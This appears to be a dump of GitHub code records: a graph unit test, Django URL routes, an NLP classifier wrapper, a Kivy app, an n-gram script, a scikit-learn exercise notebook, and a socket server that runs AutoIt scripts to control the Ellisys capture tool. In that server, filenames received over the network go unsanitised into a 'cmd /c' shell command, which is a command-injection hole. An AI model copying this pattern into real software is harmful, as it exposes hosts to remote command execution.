'A'\n a = Node(name)\n self.g.add_node(a)\n self.g.remove_node(name)\n a = self.g._node_by_name(name)\n self.assertTrue(a == None)\n\n def test_graph_from_dict(self):\n edges = ['B', 'C', 'D']\n gdict = {}\n self.g = Graph()\n gdict['A'] = edges\n self.g.graph_from_dict(gdict)\n self.assertTrue('A' in [n.name for n in self.g._nodes])\n a = self.g._node_by_name('A')\n self.assertTrue(set(edges) == set([e.name for e in a.edges()]))\n\n def test_dijkstras(self):\n graph = {}\n graph['B'] = ['C']\n graph['C'] = ['D']\n graph['D'] = ['E']\n graph['E'] = ['F']\n graph['F'] = ['Z']\n\n graph['G'] = ['H']\n graph['H'] = ['I']\n graph['I'] = ['J']\n graph['J'] = ['K']\n graph['K'] = ['L']\n graph['L'] = ['M']\n graph['M'] = ['N']\n graph['N'] = ['Z']\n\n graph['O'] = ['P']\n graph['P'] = ['Q']\n graph['Q'] = ['R']\n graph['R'] = ['S']\n graph['S'] = ['T']\n graph['T'] = ['U']\n graph['U'] = ['V']\n graph['V'] = ['W']\n graph['W'] = ['X']\n graph['X'] = ['Y']\n graph['Y'] = ['Z']\n graph['Z'] = None\n\n graph['A'] = ['B', 'G', 'O']\n\n self.g = Graph()\n\n self.g.graph_from_dict(graph)\n\n self.paths = self.g.dijkstra('A', 'Z')\n correct = ['A', 'B', 'C', 'D', 'E', 'F', 'Z']\n #path = [p.name for p in self.paths[min(self.paths.keys())][0]]\n path = [p.name for p in self.paths]\n self.assertEqual(path, correct)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"iknowed/units-convert","sub_path":"testGraph.py","file_name":"testGraph.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72343326867","text":"'''\r\nCreated on May 22, 
2016\r\n\r\n@author: Dayo\r\n'''\r\n\r\n\r\nfrom django.conf.urls import url, include\r\n\r\n\r\nfrom .views import *\r\nfrom .ajax import *\r\nfrom .helper import UploadedContactsDownloadView\r\n\r\nurlpatterns = [\r\n #url(r'^$', Index.as_view(), name='index'),\r\n url(r'^exit/$', exitdoor , name='backdoor'),\r\n url(r'^$', entrance, name='frontdoor'),\r\n url(r'^register/free-trial/$', register_free_trial, name='freetrial-signup'),\r\n url(r'^register/email-validate/$', ValidateEmail.as_view(), name='register-validate-email'),\r\n url(r'^gcrawler/$', crawler_entrance, name=\"gcrawler\"),\r\n url(r'^dashboard/$', DashboardView.as_view(), name='dashboard-view'),\r\n url(r'^ping-stat/', include([\r\n url(r'^system/$', get_system_stats, name='system-stat'),\r\n url(r'^qpc/$', get_qpc_stats, name='qpc-stat'),\r\n ])),\r\n url(r'^settings/', include([\r\n url(r'^users/$', kituser_settings, name='kituser-settings-list'),\r\n url(r'^user/(?P\\d+)/$', KITUserUpdateView.as_view(), name='kituser-detail'),\r\n url(r'^user/new/$', UserCreateView.as_view(), name='kituser-new'),\r\n url(r'^user/(?P\\d+)/delete/$', KITUserDeleteView.as_view(), name='kituser-delete'),\r\n \r\n #User Groups\r\n url(r'^user-groups/$', usergroup_settings, name='usergroup-list'),\r\n url(r'^user-group/(?P\\d+)/$', UserGroupUpdateView.as_view(), name='usergroup-detail'),\r\n url(r'^user-group/(?P\\d+)/delete/$', UserGroupDeleteView.as_view(), name='usergroup-delete'),\r\n url(r'^user-group/new/$', UserGroupCreateView.as_view(), name='usergroup-new'),\r\n #SMTP\r\n url(r'^smtps/$', smtp_settings, name='smtp-settings-list'),\r\n url(r'^smtp/(?P\\d+)/$', SMTPUpdateView.as_view(), name='smtp-detail'),\r\n url(r'^smtp/new/$', SMTPCreateView.as_view(), name='smtp-new'),\r\n url(r'^smtp/(?P\\d+)/delete/$', SMTPDeleteView.as_view(), name='smtp-delete'),\r\n url(r'^smtp/(?P\\d+)/check/$', CheckSMTPServerView.as_view(), name='smtp-check'),\r\n \r\n #Accounts\r\n url(r'^account/$', AccountManagementView.as_view(), name='account-mgmt'),\r\n url(r'^account/user/get-balance/$', get_user_balance),\r\n url(r'^account/user/transfer/$', UserBalanceTransferView.as_view(), name='user-balance-transfer'),\r\n url(r'^account/user/credit-transfer/$', user_credit_transfer, name='credit-transfer'),\r\n \r\n \r\n url(r'^account/user/send-verify-code/$', send_verification_code, name='send-verification-code'),\r\n url(r'^account/user/verify/$', verify_user_details, name='now-validate-user-details'),\r\n \r\n #my profile\r\n url(r'^user/me/$', KITUserPersonalProfileView.as_view(), name='kituser-personal-profile'),\r\n ])),\r\n #Data Management\r\n url(r'^data-mgmt/', include([\r\n url(r'import_contact/$', ContactImportView.as_view(), name='contact-import'),\r\n url(r'import_contact/upload/$', get_contact_file_upload, name='contact-upload-action'),\r\n url(r'import_contact/import/$', now_import_contacts, name='contact-import-action'),\r\n url(r'custom_data/$', CustomDataView.as_view(), name='custom-data'),\r\n url(r'export/$', now_import_contacts, name='export-data'),\r\n url('^contact/(?P[A-Za-z0-9_-]+)/download/$',UploadedContactsDownloadView.as_view(), name='download-contact-file'),\r\n ])),\r\n #custom Data\r\n url(r'^data-mgmt/', include([\r\n url(r'^custom-data/upload/$', upload_custom_data, name='upload-custom-data'),\r\n url(r'^custom-data/process-a/$', process_1_custom_data),\r\n url(r'^custom-data/(?P\\w{6})/$', get_custom_data_ajax, name='custom-data-ajax'),\r\n url(r'^custom-data/(?P\\w{6})/delete/$', delete_custom_data_ajax, 
name='delete-custom-data-ajax'),\r\n url(r'^custom-data/headers/(?P\\w{6})/$', get_custom_data_columns, name='custom-data-columns'),\r\n url(r'^custom-data/headers/$', get_custom_data_columns),\r\n ])),\r\n\r\n\r\n #User Groups\r\n url(r'^contact-lists/$', contactgroups, name='contactgroup-list'),\r\n url(r'^contact-list/', include([\r\n url(r'^new/$', ContactGroupCreateView.as_view(), name='contactgroup-new'),\r\n url(r'^(?P\\d+)/$', ContactGroupUpdateView.as_view(), name='contactgroup-detail'),\r\n url(r'^(?P\\d+)/delete/$', ContactGroupDeleteView.as_view(), name='contactgroup-delete'),\r\n ])),\r\n url(r'^contacts/$', contacts, name='contacts-list'), #lists all contacts\r\n url(r'^contact/', include([\r\n url(r'^(?P[A-Z0-9]{9})/$', ContactViewView.as_view(), name='contact-detail'),\r\n url(r'^(?P[A-Z0-9]{9})/delete/$', ContactDeleteView.as_view(), name='contact-delete'),\r\n url(r'^new/$', ContactCreateView.as_view(), name='contact-new')\r\n ])),\r\n url(r'^events/$', privateevents, name='events-list'), #lists all contacts\r\n url(r'^events/public/$', publicevents, name='public-events-list'), #lists all contacts\r\n url(r'^event/public/', include([\r\n url(r'^(?P\\d+)/$', PublicEventUpdateView.as_view(), name='public-event-detail'),\r\n url(r'^(?P\\d+)/delete/$', PublicEventDeleteView.as_view(), name='public-event-delete'),\r\n url(r'^new/$', PublicEventCreateView.as_view(), name='public-event-new')\r\n ])),\r\n url(r'^templates/$', templates, name='templates-list'),\r\n url(r'^template/', include([\r\n url(r'^(?P\\d+)/$', MessageTemplateUpdateView.as_view(), name='templates-detail'),\r\n url(r'^new/$', MessageTemplateCreateView.as_view(), name='template-new'),\r\n url(r'^(?P\\d+)/delete/$', MessageTemplateDeleteView.as_view(), name='template-delete')\r\n ])),\r\n url(r'template/(?P\\d+)/preview/', fetch_message_template_preview, name='template-preview'),\r\n]","repo_name":"dedayoa/keepintouch","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32592229540","text":"from __future__ import absolute_import, division, print_function\n\nimport numpy as np\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\nimport build_corpus_and_ss_classifier\nfrom build_classifier_from_ss_corpus import load_silver_standard, max_score_from_csv\nfrom semisuper import transformers, helpers\n\n\nclass KeySentencePredictor(BaseEstimator, TransformerMixin):\n \"\"\"predicts positions and scores of relevant sentences for list of {\"pmid\" : , \"abstract\" : } dicts\"\"\"\n\n def __init__(self, batch_size=100):\n \"\"\"load pretrained classifier and maximum score in silver standard corpus for normalization\"\"\"\n\n self.max_batch_size = batch_size\n self.pipeline = build_corpus_and_ss_classifier.train_pipeline(from_scratch=False, mode=\"tolerant\")\n\n if not hasattr(self.pipeline, \"predict_proba\"):\n self.max_score = max_score_from_csv(load_silver_standard())\n else:\n self.max_score = 1.0\n\n def fit(self, X=None, y=None):\n return self\n\n def predict(self, X):\n \"\"\"return dict with all pmids in X as keys and lists of key sentence tuples as values\n\n same as transform\"\"\"\n\n return self.transform(X)\n\n def transform(self, X):\n \"\"\"return dict with all pmids in X as keys and lists of key sentence tuples as values\"\"\"\n return helpers.merge_dicts(map(self.transform_batch, helpers.partition(X, self.max_batch_size)))\n\n def 
transform_batch(self, X):\n \"\"\"predicts positions and scores of relevant sentences for list of {pmid, abstract} dictionaries\"\"\"\n\n sentences, pmids, positions = self.sentences_pmids_positions(X)\n\n scores = self.sentence_scores(sentences)\n\n return self.hit_dict_list(pmids, scores, positions)\n\n def hit_dict_list(self, pmids, scores, positions):\n \"\"\"build up result (dict of pmids and relevant sentences) from intermediate lists\"\"\"\n\n result_dict = {pmid: [] for pmid in pmids}\n\n for pmid, (start, end), score in zip(pmids, positions, scores):\n if score > 0:\n result_dict[pmid].append((start, end, score))\n\n return result_dict\n\n def sentences_pmids_positions(self, X):\n \"\"\"turn list of dicts into lists of individual sentences, corresponding pmids, and positions\n\n dicts must have keys pmid and abstract\"\"\"\n\n sentence_lists = [transformers.sentence_tokenize(x[\"abstract\"])\n for x in X]\n\n sentences = helpers.flatten(sentence_lists)\n positions = helpers.flatten(map(self.get_positions, sentence_lists))\n\n pmids = []\n for i in range(len(X)):\n pmids += [X[i][\"pmid\"]] * len(sentence_lists[i])\n\n return sentences, pmids, positions\n\n def sentence_scores(self, sentences):\n \"\"\"return normalized scores for list of sentences independently from classifier type\"\"\"\n\n if hasattr(self.pipeline, 'predict_proba'):\n scores = self.normalized_probas(sentences)\n elif hasattr(self.pipeline, 'decision_function'):\n scores = self.normalized_dec_fns(sentences)\n else:\n scores = self.pipeline.predict(sentences)\n return scores\n\n def normalized_dec_fns(self, sentences):\n \"\"\"map decision function values to relevance score in [-1,1] using maximum score in the corpus and a cutoff\"\"\"\n\n scores = self.pipeline.decision_function(sentences)\n return np.clip(np.array(scores) * 1.0 / self.max_score, -1.0, 1.0)\n\n def normalized_probas(self, sentences):\n \"\"\"map class probabilities to relevance score in [-1,1]\"\"\"\n\n # this branch is only taken when the pipeline exposes predict_proba\n # (see sentence_scores); probas[:, 1] is the positive-class probability\n probas = self.pipeline.predict_proba(sentences)\n return (np.abs(probas[:, 1]) - 0.5) * 2\n\n @staticmethod\n def get_positions(sentences):\n \"\"\"return start and end position for each element in sentences\"\"\"\n\n end = -1\n positions = []\n\n for i in range(len(sentences)):\n start = end + 1\n end = start + len(sentences[i])\n positions.append((start, end))\n\n return positions\n","repo_name":"nachne/semisuper","sub_path":"key_sentence_predictor.py","file_name":"key_sentence_predictor.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33520066954","text":"import os\nfrom kivy.lang import Builder\nfrom kivy import platform\nfrom kivymd.app import MDApp\nfrom kivymd.uix.screenmanager import MDScreenManager\n\nfrom app.frontend.mainscreen.mainscreen import MainScreen\nfrom app.frontend.netflixloadingscreen.netflixloadingscreen import NetflixLoadingScreen\nfrom app.frontend.netflixnewdatascreen.netflixnewdatascreen import NetflixNewDataScreen\nfrom app.frontend.netflixuserscreen.netflixuserscreen import NetflixUserScreen\nfrom app.frontend.spotifyloginscreen.spotifyloginscreen import SpotifyLoginScreen\nfrom app.frontend.spotifynewdatascreen.spotifynewdatascreen import SpotifyNewDataScreen\nfrom app.frontend.spotifyuserscreen.spotifyuserscreen import SpotifyUserScreen\nfrom app.frontend.spotifyloadingscreen.spotifyloadingscreen import 
SpotifyLoadingScreen\n\nBuilder.load_file(\"main.kv\")\nBuilder.load_file(\"app/frontend/mainscreen/mainscreen.kv\")\nBuilder.load_file(\"app/frontend/netflixloadingscreen/netflixloadingscreen.kv\")\nBuilder.load_file(\"app/frontend/netflixnewdatascreen/netflixnewdatascreen.kv\")\nBuilder.load_file(\"app/frontend/netflixuserscreen/netflixuserscreen.kv\")\nBuilder.load_file(\"app/frontend/spotifyloginscreen/spotifyloginscreen.kv\")\nBuilder.load_file(\"app/frontend/spotifynewdatascreen/spotifynewdatascreen.kv\")\nBuilder.load_file(\"app/frontend/spotifyuserscreen/spotifyuserscreen.kv\")\nBuilder.load_file(\"app/frontend/spotifyloadingscreen/spotifyloadingscreen.kv\")\n\nspotify_final_data = os.path.abspath(\"app/backend/spotify/database/new_data.csv\")\nnetflix_final_data = os.path.abspath(\"app/backend/netflix/database/final_data.csv\")\n\nif platform == \"android\":\n from android.permissions import request_permissions, Permission\n request_permissions([\n Permission.INTERNET,\n Permission.READ_MEDIA_IMAGES,\n Permission.READ_MEDIA_VIDEO,\n Permission.READ_MEDIA_AUDIO\n ])\n\n\nclass WindowManager(MDScreenManager):\n pass\n\n\nclass StatsApp(MDApp):\n def build(self):\n self.title = \"stats.io\"\n return WindowManager()\n\n def on_stop(self):\n with open(\n netflix_final_data, \"w\", newline=\"\"\n ) as csv_file:\n csv_file.truncate()\n with open(\n spotify_final_data, \"w\", newline=\"\"\n ) as csv_file:\n csv_file.truncate()\n\n\nif __name__ == \"__main__\":\n StatsApp().run()\n","repo_name":"stats-io/stats.io","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25596782247","text":"from Config import OrderGeneratorConfig\nfrom Factory.Interface import AbstractGenerator\nfrom Strategies.Implementation import *\nfrom Constants import *\n\n\nclass OrderHistoryGenerator(AbstractGenerator):\n def __init__(self, config: OrderGeneratorConfig):\n self._config = config\n self._order_id = OrderIDStrategy(self._config.initial_order_id)\n self._provider_id = ProviderIDStrategy(self._config.provider_id)\n self._direction = DirectionStrategy(self._config.direction)\n self._currency_pair = CurrencyPairStrategy(self._config.currency_pairs)\n self._volume_strategy = VolumeStrategy()\n self._description = DescriptionStrategy()\n self._tags = TagsStrategy(self._config.tags)\n self._extra_data = ExtraDataStrategy()\n self._orders_list = None\n\n def generate_objects(self):\n self._orders_list = []\n for zone in self._config.zones:\n _date = DateStrategy(\n initial_date=self._config.zones[zone][ZONE_INITIAL_DATE_KEY],\n end_date=self._config.zones[zone][ZONE_END_DATE_KEY],\n steps=self._config.total_orders * self._config.zones[zone][ZONE_PERCENT_OF_TOTAL_ORDERS_KEY])\n _status = StatusStrategy(population=self._config.zones[zone][ZONE_POSSIBLE_STATUSES_KEY],\n date_strategy=_date,\n currency_strategy=self._currency_pair, vol_strategy=self._volume_strategy)\n for _ in range(self._config.total_orders):\n self._orders_list.append(\n [\n self._order_id.next_entry(),\n self._provider_id.next_entry(),\n self._direction.next_entry(),\n self._tags.next_entry(),\n _date.next_entry(),\n _status.next_entry()\n ]\n )\n\n def get_orders_list(self):\n return 
self._orders_list\n","repo_name":"hulk105/order-generator","sub_path":"object-oriented/Factory/OrderHistoryGenerator.py","file_name":"OrderHistoryGenerator.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28319664802","text":"\n# coding: utf-8\n\n# In[182]:\n\nimport pyodbc\nimport numpy\nimport pandas\nimport sqlite3\nimport nltk\n\n\n# In[183]:\n\ndata = pandas.read_csv(\"/Users/mkamalakshan/Desktop/Apryl/Facebook.csv\",header=0, delimiter=\",\",encoding='latin-1')\n\n\n# In[184]:\n\nlist(data)\n\n\n# In[185]:\n\ndata = data [['Post','Link Clicks','Time']]\n\n\n# In[186]:\n\ndata.head()\n\n\n# In[191]:\n\ndef find_ngrams(input_list, n):\n return zip(*[input_list[i:] for i in range(n)])\n\n#input_list = ['all', 'this', 'happened', 'more', 'or', 'less']\n#print (list(find_ngrams(input_list, 1)))\n#print (list(find_ngrams(input_list, 2)))\n#print (list(find_ngrams(input_list, 3)))\n#print (list(find_ngrams(input_list, 4)))\n\n\n# In[192]:\n\ndata.shape[0]\n\n\n# In[193]:\n\nimport re\n\n\n# In[203]:\n\nposted1 =[]\nposted2 =[]\nposted3 =[]\nposted4 =[]\n\nfor i in range (0,data.shape[0]):\n post=((data['Post'][i]).lower())\n post = post.replace('...','')\n post = post.replace('_','')\n post = re.sub(';','',post)\n post = re.sub(',','',post)\n post = re.sub('\\d','X',post)\n post = re.sub('--','',post)\n post = post.split()\n posted1.append(list(find_ngrams(post, 1)))\n posted2.append(list(find_ngrams(post, 2)))\n posted3.append(list(find_ngrams(post, 3)))\n posted4.append(list(find_ngrams(post, 4)))\n\n \nprint(posted1[0])\nprint(posted2[0])\nprint(posted3[0])\nposted4[0]\n\n\n# In[220]:\n\ndf1 = pandas.DataFrame(posted1)\ndf2 = pandas.DataFrame(posted2)\ndf3 = pandas.DataFrame(posted3)\ndf4 = pandas.DataFrame(posted4)\n\n\n# In[221]:\n\nnewdata1=data.join(df1)\nnewdata2=data.join(df2)\nnewdata3=data.join(df3)\nnewdata4=data.join(df4)\n\n\n# In[238]:\n\nndata1= pandas.melt(newdata1, id_vars = ['Post', 'Link Clicks','Time'])\nndata2= pandas.melt(newdata2, id_vars = ['Post', 'Link Clicks','Time'])\nndata3= pandas.melt(newdata3, id_vars = ['Post', 'Link Clicks','Time'])\nndata4= pandas.melt(newdata4, id_vars = ['Post', 'Link Clicks','Time'])\n\n\n# In[239]:\n\nprint(ndata1.shape)\nprint(ndata2.shape)\nprint(ndata3.shape)\nprint(ndata4.shape)\n\n\n# In[240]:\n\nndata1 = ndata1[ndata1['value'].notnull()]\nndata2 = ndata2[ndata2['value'].notnull()]\nndata3 = ndata3[ndata3['value'].notnull()]\nndata4 = ndata4[ndata4['value'].notnull()]\n\n\n# In[241]:\n\nprint(ndata1.shape)\nprint(ndata2.shape)\nprint(ndata3.shape)\nprint(ndata4.shape)\n\n\n# In[251]:\n\nndata1['variable'] = 'unigram'\nndata1.head()\n\n\n# In[257]:\n\nndata2['variable'] = 'bigram'\nndata2.head()\n\n\n# In[258]:\n\nndata3['variable'] = 'trigram'\nndata3.head()\n\n\n# In[259]:\n\nndata4['variable']= 'fourgram'\nndata4.head()\n\n\n# In[263]:\n\nndata = pandas.concat([ndata1,ndata2],axis=0,ignore_index=True)\nndata = pandas.concat([ndata,ndata3],axis=0,ignore_index=True)\nndata = pandas.concat([ndata,ndata4],axis=0,ignore_index=True)\n\n\n# In[264]:\n\nndata.shape\n\n\n# In[266]:\n\nndata.to_csv(\"/Users/mkamalakshan/Desktop/Apryl/output.csv\", sep='\\t', encoding='utf-8')\n\n\n# In[ ]:\n\n\n\n","repo_name":"meenu-kamalakshan/Python","sub_path":"Rare Hl NLP .py","file_name":"Rare Hl NLP .py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"1717730335","text":"#!/usr/bin/env python3\n\nimport socket\nimport os\nimport psutil\nimport messages\nimport config\nimport subprocess\nimport sys\nimport time\nfrom helper import write_logs\n\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((config.ELLISYS_HOST, config.ELLISYS_PORT))\n\n\n\n\n\ndef autoItRunAndWait(file):\n print('Running AutoIT file \"AutoIt3 au3Commands\\\\{0}\"'.format(file))\n p = subprocess.Popen('cmd /c \"AutoIt3 au3Commands\\\\{0}\"'.format(file), stdout = subprocess.PIPE)\n successfull = False\n try:\n p.wait(config.ELLYSIS_TIMEOUT_AFTER_COMMAND_RECEIVED)\n successfull = (p.returncode == 0)\n except subprocess.TimeoutExpired:\n p.kill()\n\n return successfull\n\n\ndef printCPUMemoryLogs():\n cpu = psutil.cpu_percent()\n ram = psutil.virtual_memory().percent\n\n currentTime = time.strftime(\"%d/%m/%y %H:%M:%S\", time.localtime())\n sysInfo = ' [' + currentTime + '] CPU usage: {}%, Memory usage: {}'.format(cpu, ram)\n print(sysInfo)\n write_logs(log_fname, sysInfo, \"a\")\n\ndef sendAck(client, payload):\n info = 'Sending ACK message with payload \"{0}\"'.format(payload)\n print(info)\n write_logs(log_fname, info + '\\n', 'a')\n message = str.encode(messages.NewACK(payload))\n client.sendall(message)\n\ndef sendFail(client, payload):\n info ='\"Sending a FAIL message with payload \"{0}\"'.format(payload)\n print(info)\n write_logs(log_fname, info + '\\n', 'a')\n message = str.encode(messages.NewFAIL(payload))\n client.sendall(message)\n\n\nlaunchTime = time.strftime(\"%d-%m-%y_%H-%M-%S\", time.localtime()) # for log file name\nlog_fname = \"ellisys_\" + launchTime\nwrite_logs(log_fname, \"--- Log init --- \\n\", 'w')\nlog = \"\"\n\nprint(\"Starting server...\")\nwhile True:\n s.listen(5)\n client, address = s.accept()\n print(\"New client: {}, waiting on command\".format( address ))\n\n # receive command\n response = client.recv(config.SOCKET_RECEIVE_BUFFER).decode('utf-8')\n\n # parse\n command, payload = messages.parse_msg(response)\n\n currentTime = time.strftime(\"%d/%m/%y %H:%M:%S\", time.localtime())\n info=' [' + currentTime + '] -> Received message \"{0}\", parsed as \"{1}\" args \"{2}\"'.format(response, command, payload)\n print(info)\n write_logs(log_fname, info + '\\n', 'a')\n\n\n if command == messages.CMD_OPEN_ELLISYS:\n successfull = autoItRunAndWait('open_ellisys.au3')\n if successfull:\n sendAck(client, \"Ellisys opened\")\n\n elif command == messages.CMD_CLOSE_ELLISYS:\n successfull = autoItRunAndWait('close_ellisys.au3')\n if successfull:\n sendAck(client, \"Ellisys closed\")\n\n # The file name is needed in order to AutoIt\n # to know which windws to activate (when saving a file the window name\n # changes as well)\n elif command == messages.CMD_START_CAPTURE:\n if payload != '':\n filename = payload\n successfull = autoItRunAndWait('start_capture.au3 {}'.format(filename))\n else:\n successfull = autoItRunAndWait('start_capture.au3')\n if successfull:\n sendAck(client, \"Capture started\")\n\n elif command == messages.CMD_STOP_CAPTURE:\n successfull = autoItRunAndWait('stop_capture.au3')\n if successfull:\n sendAck(client, \"Capture stopped\")\n\n elif command == messages.CMD_SAVE_CAPTURE:\n filename = payload\n successfull = autoItRunAndWait('save_capture.au3 {}'.format(filename))\n if successfull:\n sendAck(client, \"Capture \" +filename + \" saved\")\n else :\n sendFail(client, \"EllisysErrorSave\")\n continue\n\n else:\n sendFail(client, \"Command unknown.\")\n\n printCPUMemoryLogs()\n\n\n if not successfull:\n 
sendFail(client, \"AutoIt command time out: {}s reached \".format(config.ELLYSIS_TIMEOUT_AFTER_COMMAND_RECEIVED))\n print(\"Waiting for fix...\")\n\n\nprint(\"Server closed\")\nclient.close()\ns.close()\n","repo_name":"alex35469/Traffic-Analysis-on-wearables","sub_path":"Automation/ellisys_to_controler.py","file_name":"ellisys_to_controler.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8601192775","text":"\n# coding: utf-8\n\n# # Machine Learning : Toolbox, Interface, Use-Case\n# (Ref. St-18-0300).\n\n# Ce code est composé de deux parties : \n# * un exemple de scikit-learn provenant de la documentation officielle\n# * le TP\n# Votre travail sera évalué en lancant l'intégralité du script.\n# \n# Petits rappels : il faut commenter son code, mais pas trop ! ;) \n# \n# \n\n# ## Scikit Learn Package Example\n\n# Code extrait de :\n# http://scikit-learn.org/stable/auto_examples/classification/plot_classifier_comparison.html\n\n# In[1]:\n\n\nprint(__doc__)\n\n\n# Code source: Gaël Varoquaux\n# Andreas Müller\n# Modified for documentation by Jaques Grobler\n# License: BSD 3 clause\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.datasets import make_moons, make_circles, make_classification\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.gaussian_process.kernels import RBF\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nh = .02 # step size in the mesh\n\nnames = [\"Nearest Neighbors\", \"Linear SVM\", \"RBF SVM\", \"Gaussian Process\",\n \"Decision Tree\", \"Random Forest\", \"Neural Net\", \"AdaBoost\",\n \"Naive Bayes\", \"QDA\"]\n\nclassifiers = [\n KNeighborsClassifier(3),\n SVC(kernel=\"linear\", C=0.025),\n SVC(gamma=2, C=1),\n GaussianProcessClassifier(1.0 * RBF(1.0)),\n DecisionTreeClassifier(max_depth=5),\n RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1),\n MLPClassifier(alpha=1),\n AdaBoostClassifier(),\n GaussianNB(),\n QuadraticDiscriminantAnalysis()]\n\nX, y = make_classification(n_features=2, n_redundant=0, n_informative=2,\n random_state=1, n_clusters_per_class=1)\nrng = np.random.RandomState(2)\nX += 2 * rng.uniform(size=X.shape)\nlinearly_separable = (X, y)\n\ndatasets = [make_moons(noise=0.3, random_state=0),\n make_circles(noise=0.2, factor=0.5, random_state=1),\n linearly_separable\n ]\n\nfigure = plt.figure(figsize=(27, 9))\ni = 1\n# iterate over datasets\nfor ds_cnt, ds in enumerate(datasets):\n # preprocess dataset, split into training and test part\n X, y = ds\n X = StandardScaler().fit_transform(X)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.4, random_state=42)\n\n x_min, x_max = X[:, 0].min() - .5, X[:, 0].max() + .5\n y_min, y_max = X[:, 1].min() - .5, X[:, 1].max() + .5\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n\n # just plot the dataset first\n cm = plt.cm.RdBu\n cm_bright = ListedColormap(['#FF0000', 
'#0000FF'])\n ax = plt.subplot(len(datasets), len(classifiers) + 1, i)\n if ds_cnt == 0:\n ax.set_title(\"Input data\")\n # Plot the training points\n ax.scatter(X_train[:, 0], X_train[:, 1], c=y_train, cmap=cm_bright,\n edgecolors='k')\n # and testing points\n ax.scatter(X_test[:, 0], X_test[:, 1], c=y_test, cmap=cm_bright, alpha=0.6,\n edgecolors='k')\n ax.set_xlim(xx.min(), xx.max())\n ax.set_ylim(yy.min(), yy.max())\n ax.set_xticks(())\n ax.set_yticks(())\n i += 1\n\n # iterate over classifiers\n for name, clf in zip(names, classifiers):\n ax = plt.subplot(len(datasets), len(classifiers) + 1, i)\n clf.fit(X_train, y_train)\n score = clf.score(X_test, y_test)\n\n # Plot the decision boundary. For that, we will assign a color to each\n # point in the mesh [x_min, x_max]x[y_min, y_max].\n if hasattr(clf, \"decision_function\"):\n Z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()])\n else:\n Z = clf.predict_proba(np.c_[xx.ravel(), yy.ravel()])[:, 1]\n\n # Put the result into a color plot\n Z = Z.reshape(xx.shape)\n ax.contourf(xx, yy, Z, cmap=cm, alpha=.8)\n\n # Plot also the training points\n ax.scatter(X_train[:, 0], X_train[:, 1], c=y_train, cmap=cm_bright,\n edgecolors='k')\n # and testing points\n ax.scatter(X_test[:, 0], X_test[:, 1], c=y_test, cmap=cm_bright,\n edgecolors='k', alpha=0.6)\n\n ax.set_xlim(xx.min(), xx.max())\n ax.set_ylim(yy.min(), yy.max())\n ax.set_xticks(())\n ax.set_yticks(())\n if ds_cnt == 0:\n ax.set_title(name)\n ax.text(xx.max() - .3, yy.min() + .3, ('%.2f' % score).lstrip('0'),\n size=15, horizontalalignment='right')\n i += 1\n\nplt.tight_layout()\nplt.show()\n\n\n# ## TP\n# Il vous faudra faire les \"import\" des packages nécessaires à votre travail (en plus des \"import\" déjà effectués dans l'exemple).\n\n# ### étape 0 : import des packages :\n\n# In[2]:\n\n\n# import ...\n\n\n# ### étape 1.1 : importer les données\n# vous trouverez à l'adresse [data.pickle](https://github.com/jorisgu/tp_evaluation_python_edf/raw/master/data.pickle) le fichier pickle contenant un dictionnaire python contenant les variables nécessaires :\n# * X_train\n# * Y_train\n# * X_test\n# * Y_test\n# \n# Vous appliquerez l'entraînement des modèles sur les données d'entraînement et l'évaluation sur les données de test...\n# \n# Chaque ligne correspond à un exemple, X contenant les vecteurs représentatifs des données et Y les classes.\n\n# In[3]:\n\n\n# with ...\n# data = ...\n# X_train = ...\n\n\n# ### étape 1.2 : préparation des données\n# Utiliser l'algorithme de PCA de scikit-learn pour réduire la dimension des vecteurs de X à 3 features.\n\n# In[4]:\n\n\n# X_train_pca = ...\n\n\n# ### étape 2 : visualiser les données\n# Package de visualisation au choix (matplotlib, pyplot, ....)\n# \n# avec un peu de couleurs...\n\n# ### étape 3 : méthode non supervisée\n# appliquer **deux** méthodes de clustering de votre choix (par exemple k-means et DBSCAN)\n\n# ### étape 4 : méthode supervisée\n# appliquer **deux** méthodes d'apprentissage supervisées (dont une à base de [MLP](http://scikit-learn.org/stable/modules/neural_networks_supervised.html))\n\n# ### étape 5 : évaluation\n# Pour l'ensemble des 4 méthodes produites, évaluer la performance du modèle sur les données de test avec une métrique de votre choix.\n\n# ### étape 6 : question ouverte \n# En analysant les caractéristiques de votre modèle de PCA, indiquer combien de dimensions sont réellement nécessaires pour représenter 75% de l'information d'entraînement.\n\n# ### étape 7 : question facultative\n# Proposer un code qui 
